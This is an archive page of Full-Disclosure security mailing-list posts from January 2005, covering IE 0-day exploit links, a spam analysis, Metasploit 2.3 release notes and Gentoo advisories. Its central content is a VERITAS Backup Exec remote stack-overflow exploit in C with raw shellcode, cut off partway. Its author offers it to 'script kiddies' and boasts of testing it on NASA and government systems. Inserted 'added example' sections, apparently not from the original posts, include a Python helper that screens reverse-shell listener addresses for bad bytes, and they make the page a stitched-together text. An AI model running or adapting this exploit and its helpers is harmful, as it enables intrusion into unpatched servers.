RE: [Full-Disclosure] UPDATED: the insider exploit( = the latest ie 0day which involves SHOWMODALDIALOG)

2005-01-11 Thread Rafel Ivgi, The-Insider
I forgot to tell everyone that I made an ASPX version of Jelmer's exploit.

So let's sum it up; all the exploits for the 0-day --> "The-Insider-Prototype" (as
defined by Liu) are:
1) JSP VERSION BY JELMER -
http://www.k-otik.com/exploits/07072004.IEApplicationShell.php
2) PHP VERSION BY Liu Die Yu - http://0daymon.org/monitor/insider/dir.zip
3) ASPX VERSION BY Rafel Ivgi - http://theinsider.deep-ice.com/The-Insider.zip


Greetings: Liu Die Yu, Drew Copley, Malware

Rafel Ivgi, The-Insider
Security Consultant

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: AV security contacts

2005-01-11 Thread juha-matti . laurio
There is an Open Source Vulnerability Database (OSVDB) Vendor Dictionary
available at
http://www.osvdb.org/vendor_dict.php

A common e-mail address and/or security contact is available in that list,
for example http://www.osvdb.org/vendor_dict.php?section=vendor&id=1229&c=S
(Symantec).

Additionally, Secunia has their Products => Software section page 
available,
http://secunia.com/product/#software

for example http://secunia.com/product/164/  (Sophos).
You can select the 'Vendor' link to visit the vendor's home page.
Look at 'Contact Us' etc.

However, you waited only three hours for a reply to your question.
Check those lists and send your analysis to them.


Regards,
Juha-Matti
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Interesting but suspicious possible phishing mail

2005-01-11 Thread DAN MORRILL
Hi folks,
Got this really interesting mail in my box today, and I know that I haven't
used that e-mail address or ordered anything online lately. Wondering whether it
might be a phishing e-mail. Haven't seen anything like this before.
Anyone seen anything similar?
r/
Dan


from :  Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
Sent :  Monday, January 10, 2005 10:40 PM
To :  "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
CC :  [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
[EMAIL PROTECTED], [EMAIL PROTECTED]
Subject :  Shipping Notification, Tracking Number : TCD461649887242ESB

MIME-Version: 1.0
Received: from msnmail2.uswest.net ([63.226.138.22]) by mc10-f38.hotmail.com 
with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -
Received: from unknown (63.226.138.18) by msnmail2.uswest.net with QMQP; 10 
Jan 2005 22:45:55 -
Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
X-Message-Info: JGTYoYF78jHm2Kmrh/becsOSGajhcE+aqhdcaXLDOFI=
Delivered-To: [EMAIL PROTECTED]
X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 Fuz1=4 Fuz2=4
Return-Path: [EMAIL PROTECTED]
X-OriginalArrivalTime: 10 Jan 2005 22:45:54.0814 (UTC) 
FILETIME=[24BA71E0:01C4F766]


Content-Type: multipart/mixed; 
boundary="-mpls-cmx-12.inet.qwest.net-1105397155-56110"

Content-Type: text/plain
This email was forwarded from your previous Qwest.net email address
to your MSN email address.  To discontinue email forwarding for any
future emails sent to your previous Qwest.net email address, please
contact MSN Customer Service.


Content-Type: message/rfc822
Content-Description: forwarded message
Content-Transfer-Encoding: 8bit
Content-Disposition: inline
From: Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
To: "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
[EMAIL PROTECTED]
Subject: Shipping Notification, Tracking Number : TCD461649887242ESB
Sent: Monday, January 10, 2005 10:40 PM
MIME-Version: 1.0
Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 Fuz1=4 Fuz2=4
Content-Type: multipart/alternative;
boundary="--Part_GRKDac7J6.oMXawOLoYO4"

Content-Type: text/html; format=flowed; charset=iso-8859-15
Content-Transfer-Encoding: quoted-printable
Check your status Below:
cov2pa.com/track.asp?cg=1&c=tc
The illiterate of the 21st century will not be those who cannot read and 
write, but those who cannot learn, unlearn, and relearn. Alvin Toffler
Those police officers are practicing driving between the two buildings.
The illiterate of the 21st century will not be those who cannot read and 
write, but those who cannot learn, unlearn, and relearn. Alvin Toffler
Haven't the photographers already disliked praying?
Few things are harder to put up with than the annoyance of a good example.
3
When people are free to do as they please, they usually imitate each other. 
-Eric Hoffer (1902-1983)
Have you already loved sleeping?




Sometimes MSN E-mail will indicate that the message failed to be delivered.
Please resend when you get those; it does not mean that the mailbox is bad,
merely that MSN mail is overworked at the time.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] full-disclosure@lists.netsys.com

2005-01-11 Thread Nicolas Waisman
Libdisassemble is not a disassembler, just a lib. The simple disassemble is
just an example of how easy it is to use it (it's a two-line assembler that shows
how to incorporate its opcode disassembly, hence the term 'lib..disassembly').

Nico
Immunity, Inc


> my mistake...

>short jump:
>it's JMP_Address + 2 + Second_Byte_value = Next_Instruction_Address

>shadown at twister:~/tmp$ echo -n -e "\x75\x65" > a
>shadown at twister:~/tmp$ ndisasm -b32 a
>  7565  jnz 0x67
>shadown at twister:~/tmp$ ~/instalar/libdisassemble/disassemble.py a 0x0 0xff
>Disassembling file a at offset: 0x0
> :   jnz   0x65

>this is where my mistake came from ;)
>thnx
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
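The formula in the quoted reply (JMP_Address + 2 + Second_Byte_value) holds only while the displacement is positive: the second byte of a short jump is a signed rel8, so 75 FE jumps backwards, and the same sign extension applies to the rel32 forms. The Python below is an added example, not part of the post or of libdisassemble, that computes the absolute target for the rel8 and rel32 relative branches (assuming 32-bit operand size and no prefixes). The condition-code names follow the Intel manual rather than ndisasm's spelling, so 0x75 prints as jne where ndisasm printed jnz.

```python
"""Relative-branch target computation for x86 (added example, not from the post)."""
import struct

# Condition codes for opcodes 0x70-0x7F (rel8) and 0x0F 0x80-0x8F (rel32),
# Intel manual spelling: 0x75 / 0x0F 0x85 is "jne" (ndisasm prints "jnz").
CC = "o no b ae e ne be a s ns p np l ge le g".split()


def relative_branch_target(insn_addr, code):
    """Return (length, target) for the relative jump/call at the start of
    code, or None if it is not one. target = address of the next instruction
    + sign-extended displacement, wrapped to 32 bits. Assumes 32-bit operand
    size and no prefixes."""
    if len(code) < 2:
        return None
    op = code[0]
    if (op & 0xF0) == 0x70 or op in (0xEB, 0xE3):      # Jcc / JMP / JECXZ rel8
        length, disp = 2, struct.unpack("<b", code[1:2])[0]
    elif op in (0xE8, 0xE9):                             # CALL / JMP rel32
        if len(code) < 5:
            return None
        length, disp = 5, struct.unpack("<i", code[1:5])[0]
    elif op == 0x0F and (code[1] & 0xF0) == 0x80:        # Jcc rel32
        if len(code) < 6:
            return None
        length, disp = 6, struct.unpack("<i", code[2:6])[0]
    else:
        return None
    return length, (insn_addr + length + disp) & 0xFFFFFFFF


def describe(insn_addr, code):
    """Mnemonic plus absolute target, e.g. 'jne 0x67' for 75 65 at address 0."""
    decoded = relative_branch_target(insn_addr, code)
    if decoded is None:
        return None
    length, target = decoded
    op = code[0]
    if (op & 0xF0) == 0x70:
        mnemonic = "j" + CC[op & 0x0F]
    elif op == 0x0F:
        mnemonic = "j" + CC[code[1] & 0x0F]
    elif op == 0xE8:
        mnemonic = "call"
    elif op == 0xE3:
        mnemonic = "jecxz"
    else:
        mnemonic = "jmp"
    return f"{mnemonic} 0x{target:x}"


if __name__ == "__main__":
    # The thread's example, plus a backward jump the unsigned formula gets wrong.
    for addr, code in ((0, b"\x75\x65"), (0x1000, b"\x75\xfe"),
                       (0x401000, b"\xe9\x00\x10\x00\x00")):
        print(f"{addr:08x}: {code.hex()}  {describe(addr, code)}")
```

For 75 65 at offset 0 this gives 0x67, matching ndisasm; for 75 FE at 0x1000 it gives 0x1000, a jump to itself, where the unsigned formula would give 0x1100.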


Re: [Full-Disclosure] Interesting but suspicious possible phishing mail

2005-01-11 Thread Vincent Archer
On Tue, Jan 11, 2005 at 02:27:55AM +, DAN MORRILL wrote:
> Got this really interesting mail in my box today, and knowing that I 
> haven't used that e-mail address or ordered anything on line lately. 
> Wondering if it might not be a phishing e-mail. Haven't seen anything like 
> this before. Anyone see anything similar?

No, not phishing. Just the usual spam for on-line meds.

Major hints: spurious text destined to foil Bayesian spam filters, and a subject
targeted to get you to open the mail ("what? I didn't order anything!").

-- 
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
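The check that settles a question like Dan's is to walk the Received chain from the top (the recipient's own relay) down to the first hop in which an outside host handed the mail to a trusted relay; every Received line below that one was written by the sender and can be forged. In the forwarded headers that hop is 42-171-64.adsl.cust.tie.cl (200.42.171.64), a consumer ADSL line, delivering straight to Qwest's mpls-cmx-12 relay, which is not how a merchant's shipping system sends mail. The Python below is an added example, not from either post: the trusted-relay suffixes and the 63.226.138.x Qwest cluster range are assumptions about the recipient's side, the From/To addresses are placeholders, and the body is a constructed excerpt of the forwarded spam.

```python
"""Received-chain and body triage for a suspect mail (added example, not from the thread)."""
import re

# Assumptions about the recipient's side: MSN/Hotmail and the old Qwest/USWest
# account are our own relays, and 63.226.138.x is the Qwest mail cluster that
# appears in the chain. Adjust these to your own infrastructure.
TRUSTED_SUFFIXES = ("hotmail.com", "uswest.net", "qwest.net")
TRUSTED_NETS = ("63.226.138.",)
CONSUMER_HINTS = ("adsl", "dsl", "dial", "dyn", "cust", "pool", "cable")

RECEIVED_FROM = re.compile(
    r"^Received:\s+from\s+(?P<helo>\S+)\s+\(\[?(?P<ip>\d+\.\d+\.\d+\.\d+)\]?\)\s+by\s+(?P<by>\S+)",
    re.MULTILINE,
)
ADDR = re.compile(r"<([^>]+)>")
URL = re.compile(r"\b[\w.-]+\.[a-z]{2,}/\S*", re.IGNORECASE)


def parse_received(raw_headers):
    """Hops in header order: the first one is the relay nearest the recipient.
    Local handoffs such as '(qmail ... invoked by uid 0)' have no 'from' and are skipped."""
    return [m.groupdict() for m in RECEIVED_FROM.finditer(raw_headers)]


def is_trusted(hop):
    return hop["helo"].endswith(TRUSTED_SUFFIXES) or hop["ip"].startswith(TRUSTED_NETS)


def originating_hop(hops):
    """Walk outward from the recipient. The first hop in which an untrusted host
    handed the mail to one of our relays is where it entered; every Received
    line below it was written by the sender and may be forged."""
    for hop in hops:
        if hop["by"].endswith(TRUSTED_SUFFIXES) and not is_trusted(hop):
            return hop
    return None


def header(raw_headers, name):
    m = re.search(rf"^{name}:\s*(.+)$", raw_headers, re.MULTILINE)
    return m.group(1).strip() if m else ""


def triage(raw_headers, body):
    """Indicators found; an empty list means nothing stood out."""
    findings = []
    origin = originating_hop(parse_received(raw_headers))
    if origin:
        findings.append(f"origin {origin['ip']} ({origin['helo']})")
        if any(h in origin["helo"].lower() for h in CONSUMER_HINTS):
            findings.append("origin is a consumer/dynamic host, not a merchant mail server")
    sender = ADDR.findall(header(raw_headers, "From"))
    rcpt = ADDR.findall(header(raw_headers, "To"))
    if sender and sender == rcpt:
        findings.append("From and To are the same address (self-addressed, real targets in Cc/Bcc)")
    lines = [l for l in body.splitlines() if l.strip()]
    filler = [l for l in lines if not URL.search(l)]
    if len(filler) >= 3 and len(filler) * 2 > len(lines):
        findings.append(f"{len(filler)} of {len(lines)} body lines carry no link: padding to skew Bayesian scoring")
    return findings


# Constructed sample: the Received chain of the forwarded message above with
# placeholder From/To addresses; tie.cl is a Chilean ISP.
SAMPLE_HEADERS = """\
Received: from msnmail2.uswest.net ([63.226.138.22]) by mc10-f38.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55
Received: from unknown (63.226.138.18) by msnmail2.uswest.net with QMQP; 10 Jan 2005 22:45:55
Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55
Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42
From: Gabrielle U. Philips, Jr <gphilips@example.net>
To: "Gabrielle U. Philips, Jr" <gphilips@example.net>
Subject: Shipping Notification, Tracking Number : TCD461649887242ESB
"""

# Constructed excerpt of the body: one link, then unrelated quotations.
SAMPLE_BODY = """\
Check your status Below:
cov2pa.com/track.asp?cg=1&c=tc
The illiterate of the 21st century will not be those who cannot read and write.
Those police officers are practicing driving between the two buildings.
Few things are harder to put up with than the annoyance of a good example.
Have you already loved sleeping?
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_HEADERS, SAMPLE_BODY):
        print("-", finding)
```

None of these indicators is proof on its own; the origin hop is the one worth a WHOIS or abuse report, and the self-addressed From/To with a long Cc list is the usual shape of a bulk run rather than a targeted phish.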


Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-11 Thread Marcy Darcy
I'm running a small server with the 2.6.10 kernel.

The exploit doesn't seem to be working on this kernel. Is there a way
to make sure the system is vulnerable or not?

#uname -a 
Linux test 2.6.10 #1 SMP Mon Jan 3 10:20:00 i686 Intel(R) Pentium(R) 4
CPU 3.00GHz GenuineIntel GNU/Linux
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Security Contact for Nokia Mobile phone softwares

2005-01-11 Thread rohit
Hi,
Does anyone know of a security contact for Nokia or Symbian OS?
Specifically for models 6600 and 7610.
Please reply to me directly as I am not on the list.
Thanks
Rohit
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] UPDATED: the insider exploit( = the latest ie0day which involves SHOWMODALDIALOG)

2005-01-11 Thread Ferruh Mavituna

4) Classic ASP version;
http://ferruh.mavituna.com/article/?553


Ferruh Mavituna
http://ferruh.mavituna.com
PGPKey: http://ferruh.mavituna.com/pgpkey.asc
 

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Rafel Ivgi, The-Insider
> Sent: Tuesday, January 11, 2005 10:37 AM
> To: bugtraq@securityfocus.com; 
> full-disclosure@lists.netsys.com; [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] UPDATED: the insider exploit( 
> = the latest ie0day which involves SHOWMODALDIALOG)
> 
> I forgot to tell everyone that I made an ASPX version of 
> Jelmer's exploit.
> 
> So let's sum it up; all the exploits for the 0-day --> 
> "The-Insider-Prototype" (as defined by Liu) are:
> 1) JSP VERSION BY JELMER -
> http://www.k-otik.com/exploits/07072004.IEApplicationShell.php
> 2) PHP VERSION BY Liu Die Yu - 
> http://0daymon.org/monitor/insider/dir.zip
> 3) ASPX VERSION BY Rafel Ivgi - 
> http://theinsider.deep-ice.com/The-Insider.zip
> 
> 
> Greetings: Liu Die Yu, Drew Copley, Malware
> 
> Rafel Ivgi, The-Insider
> Security Consultant
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Metasploit Framework v2.3

2005-01-11 Thread H D Moore
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.3 release includes three user interfaces,
46 exploits and 68 payloads.

The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down version
of the Cygwin environment.

Some highlights in this release:

 - Complete overhaul of the Framework payload collection
+ Win32 ordinal-stagers are now included (92-byte reverse connect)
+ A handful of new sparc payloads have been added (sol, linux, bsd)
+ Reliability problems have been resolved in bsd, linux, and win32
+ New udp-based linux shell stagers and shell payloads
+ New size-optimized Mac OS X encoders and payloads

 - Includes the win32 version of the Meterpreter
+ Dynamically load new features over the network w/o disk access
+ In-memory dll injection of the basic meterpreter shell
+ Current extensions include Fs, Process, Net, and Sys
+ Extensive documentation is available online:
  * http://metasploit.com/projects/Framework/docs/meterpreter.pdf

 - Complete rewrite of the 'msfweb' user interface
+ Generate and encode stand-alone shellcode from the web interface
+ The interface is skinnable and includes three different themes
+ Streaming HTTP is used to provide a 100% web-based shell
+ Ability to set advanced options in the web interface

 - Massive speed enhancements in msfconsole and msfweb
+ Snappier response and quicker load times on older systems
+ Optimizations made to various sort/search algorithms
+ Modules are no longer reloaded after each exploit

 - New exploits
+ Microsoft WINS Service Memory Overwrite (MS04-045) 
+ Samba trans2open() Buffer Overflow (Mac OS X)
+ 4D WebSTAR FTP Server Buffer Overflow (Mac OS X)
+ Veritas Name Service Registration Buffer Overflow
+ AOL Instant Messenger 'goaway' Buffer Overflow
+ IPSwitch IMail IMAPD 'delete' Buffer Overflow
+ Seattle Labs Mail Server POP3 Buffer Overflow
+ UoW IMAPD Buffer Overflow (sparc, ia32)
+ IRIX lpdsched Remote Command Execution
+ CDE dtspcd Buffer Overflow (Solaris)
+ IIS 4.0 ism.dll HTR Buffer Overflow 
+ IIS w3who.dll ISAPI Buffer Overflow


This release is available from the Metasploit.com web site:
  - Unix:  http://metasploit.com/tools/framework-2.3.tar.gz
  - Win32: http://metasploit.com/tools/framework-2.3.exe

Screen shots of the new release are online and available from:
  - http://metasploit.com/projects/Framework/screenshots.html
  
A demonstration of the new msfweb interface is running live from:
  - http://metasploit.com:5/
  

Exploit modules designed for the 2.2 release should maintain
compatibility with 2.3. If you run into any problems using older
modules with this release, please let us know.

The Framework development team consists of four active members and a
handful of part-time contributors. Check out the 'Credits' exploit
module for a complete list of contributors.

You can subscribe to the Metasploit Framework mailing list by sending a
blank email to framework-subscribe[at]metasploit.com. This is the
preferred way to submit bugs, suggest new features, and discuss the
Framework with other users.

If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com.

Starting with the 2.2 release, it is now possible to perform a system-wide
installation of the Framework. Simply extract the tarball into the
directory of your choice and create symbolic links from the msf*
executables to a directory in the system path. Users may maintain their
own exploit module collections by placing them into ~/.msf/exploits/. If
you are interested in adding the Framework to an operating system
distribution, please drop us a line and we will gladly help with the
integration and testing process.

For more information about the Framework and this release in general,
please refer to the online documentation, particularly the User Guide:
  - http://metasploit.com/projects/Framework/documentation.html


The Opcode Database has been refactored in order to support more granular
queries. The new version provides users with the ability to easily cross
reference specific opcode types, classes, and meta classes across one or
more modules for one or more operating system versions. This level of
granular control allows for a robust and flexible interface that can be
used to determine opcode portability. Aside from opcodes themselves, the
opcode database also contains detailed information about the segments,
imports, and exports that are associated with each module in the database.

A quick overview of the features included in the new database is:
  - Granular searching of opcodes of a specific type, class, and meta class.
  - Searching modules provided directly from Windbg's module list.
  - Cross referencing opcodes across various operating system versions.
  - Detailed module inform

[Full-Disclosure] VERITAS Backup Exec 8.x/9.x Remote Universal Exploit

2005-01-11 Thread class 101



Because k-otik are poor losers not respecting the publication of Metasploit 2.3, I'm forced to post my code.

/*
VERITAS Backup Exec v9.1.4691.SP1 / v9.1.4691.SP0 / v8.5.3572
Agent Browser Service, Remote Stack Overflow

Highly Critical

All credits to:

- iDEFENSE (discovery - www.iDEFENSE.com)
- Thor Doomen (iat-syscall[at]inbox.lv)
- H.D. Moore (scode - www.metasploit.com)
- Matt Miller (scode - www.hick.org)

Extra notes:

All my tests/debugs were a bit long (some days), firstly due to the big size of
Backup Exec and the instability across different Windows versions in making that
IAT method work with 100% success, and the difficulty of debugging it. (As a
reminder, because only 60 bytes are free, a tiny shellcode is sent first to scan
for the recv function of benetns.exe and jump to the data submitted during the
second send, thanks syscall.) Let's think large now. Imagine that you exploit the
hole and submit the shellcode 5 minutes later: the service will hang to death, of
course, until a kill. Now imagine that you exploit the hole and submit the
shellcode too fast for the computer to process: the shellcode can be missed and
won't be executed again, sometimes yes/no, but really unstable. Hopefully (or
unfortunately for you, admin :>) I'm here to optimize it and make it 100% working,
universal, stable, whatever you want, for the good fortune of script kiddies and to
show what "working" means to my good friends ka-odick :>

Tries:

Machine                              Bind   Reverse   Success
(2x) Win2k SP4    Server  English     10      10        20
(1x) Win2k SP4    Pro     English      5       5        10
(1x) WinXP SP1    Pro     English      5       5        10
(1x) WinXP SP1a   Pro     English      5       5        10
(3x) Win2003 SP0  Server  English      5       5        10
(1x) Win2003 SP0  Server  Italian      5       5        10
(1x) NT4          Server  English      5       5        10

= Universal

v0.1: C code based on Thor Doomen's code posted at the metasploit mailing list,
excellent in the method, but super unstable, not to say not working when used;
made some changes.

v0.2: fix of the first big problem, the missed shellcode across different Windows
versions; fixed by flooding benetns with more sends, timer really small, this is
important. Padding 1 NOP to the reverse shellcode as needed, else crash on reverse.

v0.3: universal esi call across v9.1 SP0 and SP1, for the good fortune of script
kiddies.

v0.4: As a warning, this PoC v0.4 has been tested working by an anonymous tester
(never mentioned there) on some organisations such as NASA, states/edus; it's
urgent to update 1 month after the advisory, sleepers.

Tips:
- make sure that your IP is free of null bytes in reverse mode.
- make sure that you target the right version of Backup Exec, else you crash it.
- Backup Exec v10.0 is now available, get it at www.veritas.com.
- Visit dfind.kd-team.com for a patched benetns.exe, quick solution for an urgent
  update (extracted from the hotfix at www.veritas.com). Backup Exec 9.x is tested
  safe after replacing the .exe.

Greetings: Nima Majidi, Behrang Fouladi, Pejman, keystr0ke, JGS, DiabloHorn,
kimatrix, NaV, New Metasploit v2.3 (http://www.metasploit.com/) and all idlers of
#n3ws on Eris Free Network.

by class101 [at] hat-squad.com
Answering all the stupid questions that I got & will get: no, I'm not Persian, and
you don't care where I come from.

04 January 2005
*/
#include 
#include 
#include 
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#endif

char scode1[]=
// Matt Miller's 'skape' shellcode.
"\x90"  // pad needed there for me; if you get scode detection problems on slow
        // connections, try to add more NOPs and make sure to update the memcpys
        // later in the code.
"\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad"
"\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24"
"\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"
"\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"
"\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03"
"\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa9\xff"
"\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72"
"\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"
"\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"
"\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f"
"\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8\x01\x63"
"\x6d\x64\x
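The tip "make sure that your IP is safe of null bytes in reverse mode" refers to the address and port bytes a reverse-connect payload embeds in its sockaddr_in: an address octet of 0, or a port whose high or low byte is 0, puts a NUL into the shellcode, and anywhere the target handles the buffer as a C string the payload is truncated at that byte. The Python below is an added example, not part of class101's code, that packs the listener address and port the way the payload does and reports which bytes collide with the bad-character set; it assumes only 0x00 is bad for this service.

```python
"""Bad-character check for the address and port a reverse-connect payload
embeds (added example, not part of class101's exploit)."""
import socket
import struct

# Assumption: only the null byte is bad for this service. Text-based
# services usually add CR, LF and sometimes space.
DEFAULT_BADCHARS = b"\x00"


def connect_back_params(ip, port):
    """The 6 bytes the stager carries: IPv4 address then port, both in network
    byte order, exactly as they sit in a sockaddr_in."""
    return socket.inet_aton(ip) + struct.pack("!H", port)


def find_badchars(data, badchars=DEFAULT_BADCHARS):
    """(offset, value) for every byte of data that is in badchars."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def check_listener(ip, port, badchars=DEFAULT_BADCHARS):
    """Human-readable list of the address/port bytes that would break the payload."""
    problems = []
    for off, val in find_badchars(connect_back_params(ip, port), badchars):
        where = f"address octet {off + 1}" if off < 4 else f"port byte {off - 3}"
        problems.append(f"{where} is 0x{val:02x}")
    return problems


def first_clean_port(start=1024, badchars=DEFAULT_BADCHARS):
    """Smallest port >= start whose two network-order bytes avoid badchars.
    The address cannot be fixed this way: pick another interface or a NAT."""
    for port in range(start, 65536):
        if not find_badchars(struct.pack("!H", port), badchars):
            return port
    return None


if __name__ == "__main__":
    for ip, port in (("10.0.0.5", 4444), ("192.168.1.20", 4444), ("192.168.1.20", 80)):
        print(f"{ip}:{port} -> {check_listener(ip, port) or 'clean'}")
    print("first clean port >= 256:", first_clean_port(256))
```

A listener on 10.0.0.5 fails regardless of port because two of its octets are zero; 192.168.1.20:4444 is clean, and 192.168.1.20:80 fails on the high byte of the port, which is why ports above 255 with a non-zero low byte are the usual choice.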

[Full-Disclosure] [ GLSA 200501-16 ] Konqueror: Java sandbox vulnerabilities

2005-01-11 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Konqueror: Java sandbox vulnerabilities
  Date: January 11, 2005
  Bugs: #72750
ID: 200501-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


The Java sandbox environment in Konqueror can be bypassed to access
arbitrary packages, allowing untrusted Java applets to perform
unrestricted actions on the host system.

Background
==

KDE is a feature-rich graphical desktop environment for Linux and
Unix-like Operating Systems. Konqueror is the KDE web browser and file
manager.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  kde-base/kdelibs   < 3.3.2   >= 3.3.2

Description
===

Konqueror contains two errors that allow JavaScript scripts and Java
applets to have access to restricted Java classes.

Impact
==

A remote attacker could embed a malicious Java applet in a web page and
entice a victim to view it. This applet can then bypass security
restrictions and execute any command, or access any file with the
rights of the user running Konqueror.

Workaround
==

There is no known workaround at this time.

Resolution
==

All kdelibs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdelibs

Note: There is currently no fixed stable version for sparc.

References
==

  [ 1 ] KDE Security Advisory: Konqueror Java Vulnerability
http://www.kde.org/info/security/advisory-20041220-1.txt
  [ 2 ] CAN 2004-1145
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1145

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgpMDLTFlO5mm.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] [ GLSA 200501-17 ] KPdf, KOffice: More vulnerabilities in included Xpdf

2005-01-11 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200501-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: KPdf, KOffice: More vulnerabilities in included Xpdf
  Date: January 11, 2005
  Bugs: #75203, #75204
ID: 200501-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


KPdf and KOffice both include vulnerable Xpdf code to handle PDF files,
making them vulnerable to the execution of arbitrary code if a user is
enticed to view a malicious PDF file.

Background
==

KPdf is a KDE-based PDF viewer included in the kdegraphics package.
KOffice is an integrated office suite for KDE.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  app-office/koffice   < 1.3.5-r1   >= 1.3.5-r1
  2  kde-base/kdegraphics < 3.3.2-r1   >= 3.3.2-r1
